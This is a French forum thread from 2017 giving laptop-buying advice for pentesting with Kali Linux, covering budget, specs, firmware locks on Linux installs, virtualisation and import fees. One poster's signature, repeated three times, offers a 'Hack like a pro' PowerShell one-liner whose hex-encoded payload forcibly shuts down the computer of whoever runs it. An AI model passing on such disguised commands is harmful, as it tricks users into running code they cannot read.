Annonce

Réduire
Aucune annonce.

Quel PC portable acheté en 2017 pour du pentest?

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Quel PC portable acheté en 2017 pour du pentest?

    Bonjour,
    Tout est dans le titre je recherche un PC portable pour du pentest (sous kali linux) avec un budget de max.1000€ (donc ça va) mais si vous trouver des PC portables jusqu'à 1500€ qui sont bien meilleurs linké les comme même que je check au cas où...
    J'attends que le PC dispose d'un I7 d'au moins 500 Go avec au moins 256 en SSD et de 8Go de RAM mini. (full hd). Avec une autonomie décente et s'il est léger c'est parfait
    Je pense que pour 1000€ ce n'est pas trop demander enfin vous pourrez me le dire sachant que j'ai trouvé ceci (https://www.amazon.com/Acer-E5-575G-...sprobs-20&th=1) 750€ livraison incluse il me suffit juste d'acheter des autocollant azerty et de changer les paramètre pour avoir un clavier azerty.
    (Il a juste peu d'espace disque et de RAM mais les deux sont extensibles et il n'est pas léger.)
    Voilà donc je vous remercie de votre aide par avance et j'essaie de faire ma présentation ce soir
    Dernière modification par sterwer, 26 septembre 2017, 16h45.

  • #2
    Pas vraiment besoin d'auto de puissance pour du pentest. Moi je te dirais de t'engager sur un Asus parce que j'ai jamais eu de problèmes avec mais chacun prêche pour son église en réalité. Si y'a un truc que je te conseille plus que tout c'est de bien vérifier que le PC est pas bloqué pour installer Linux, de plus en plus de PC ont ce genre de paramètres d'usines et c'est très difficile et prise de tête à contourner.

    Commentaire


    • #3
      Salut,

      T'auras le temps de t'en rendre compte plus tard, mais t'as pas besoin d'un PC à 1000 balles pour faire du pentest.
      Un petit thinkpad d'occaz à 300 € ferai très bien le taff.
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Je sais que je suis pas obligé mais j'en profite vu que j'ai le budget et puis je suis pas obliger de faire que ça avec de toute façon. Donc voilà et le pc que j'ai trouvé au US et débloqué pour installer linux

        Commentaire


        • #5
          Dans ce cas, profite pour virtualiser (Et donc pas mettre Kali en host, mais plutôt une "vrai" distrib, sur laquelle tu installe tes tools courrants puis
          - Une kali virtualisées pour avoir des trucs plus spécifiques sous la main
          - Une windows pour les tools windows (MS offce xD)

          Et dans ce cas vise 16G de RAM, c'est pas ce qui coute cher.

          Perso j'utilise comme ça un Asus ROG. Mais c'est lourd, et pas super portable, même si c'est un 15'.
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

          Commentaire


          • #6
            Je pense que je vais prendre le pc que j'ai trouver au US et je l'upgrade quand j'en aurais besoin
            Merci de vos réponses en tout cas

            Commentaire


            • #7
              PS : Renseignes-toi sur les frais de douane / TVA si t'achètes aux US.
              Hack like a pro :
              PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

              Commentaire


              • #8
                J'ai dit que j'avais déjà regarder pour la livraison et la TVA dans le premier post
                AmazonGlobal Shipping =$27.77
                Estimated Import Fees Deposit=$145.55
                Total $873.33 soir environ 750 € je crois quand France j'ai pas mieux xD

                Commentaire

                Chargement...
                X